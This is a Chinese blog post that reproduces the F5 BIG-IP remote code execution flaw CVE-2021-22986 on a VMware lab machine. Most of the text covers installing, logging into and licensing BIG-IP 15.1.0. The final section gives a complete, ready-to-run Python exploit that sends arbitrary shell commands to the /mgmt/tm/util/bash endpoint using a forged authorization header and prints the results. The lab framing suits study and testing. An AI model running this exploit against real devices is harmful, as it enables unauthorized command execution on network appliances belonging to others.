F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

本文链接：https://blog.csdn.net/qq_37200100/article/details/117948366

一、在vmware上安装BIGIP-15.1.0

进入F5官方主页：https://support.f5.com/csp/home
点击下载按钮（如下图所示）
在这里插入图片描述
进入页面后，我们选择v15.X版本

选择15.1.0长期维护版本

在这里，我们选择虚拟化版本

点击我接受按钮

选择第一个下载

下载完成之后，我们将下载下来的ova文件拖动到虚拟机当中，即可完成虚拟机的安装
在这里插入图片描述

二、BIGIP虚拟机的初始使用

虚拟机登陆
虚拟机装好后默认的用户名是 root，密码是default.
个别用户登陆后，会强制要求更换密码。这里更换的密码不能是一些常用的字符组合（比如单词）否则很容易不通过。如果您失败了几次，不妨尝试类似于f8fa7g4k3k69o这样的密码。
远程web登陆
虚拟机root登陆成功后，通过ifconfig命令获取ip地址(虚拟机要桥接模式哦)，假设这里获取的ip为10.0.0.166, 那么在host主机访问这个网址，进入web配置页面
在这里插入图片描述

web远程登陆的用户名和密码都是admin,但是我在登陆的时候密码始终不对，最后，我只好重置这个密码（如下图，输入两遍新密码）

终于，在重置密码后，我web远程登陆成功了

license激活
接下来，我们点击license按钮（我这里是激活过的）
在这里插入图片描述
如果不是已激活的状态，需要进入官网：（http://www.f5.com/trial）来获取激活码
流程如图所示，选择红色框框选中的按钮

点击Get started按钮

填写你的申请信息（官网要登陆哦）

稍后，会在半个小时内，将激活码发送到您的邮箱里面（邮箱是官网账号注册时留的邮箱）
我们收到激活码后填写到下面的Base Registration Key栏中，然后选择Automatic模式进行激活（因为本人激活过了，所以下图是在网上找的，网上的那个人选择的是第二个，这里我实际操作选择的是第一个）
在这里插入图片描述
然后点击Next按钮，如果出现下一步或者我接受之类的按钮一律点击即可
之后一般会自动跳转到如下图所示的界面，这就代表激活成功了

三、远程代码执行命令

执行代码

import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def attack(target_url, command="pwd"):
    command = f"\'{command}\'"
    check_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    data = {'command': "run",'utilCmdArgs':f"-c {command}"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print(" {} 存在漏洞".format(target_url))
            attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)
            return attack_result
        else:
            print("{} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {}'.format(target_url))


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {}'.format(url))



if __name__ == '__main__':
    # 你的虚拟机ip地址
    ip = "your ip"
    # 执行的命令
    command = "ls"
    url = format_url(ip)
    # 输出返回结果
    print(attack(url, command))

上面的代码用户使用的时候，只需要将ip 改成您虚拟机的ip即可，其余无需改变

执行结果展示

查看当前路径
查看当前路径下的文件

3.创建一个目录

到虚拟机中，我们查看目录是否创建成功

在这里插入图片描述
可以看到目录创建成功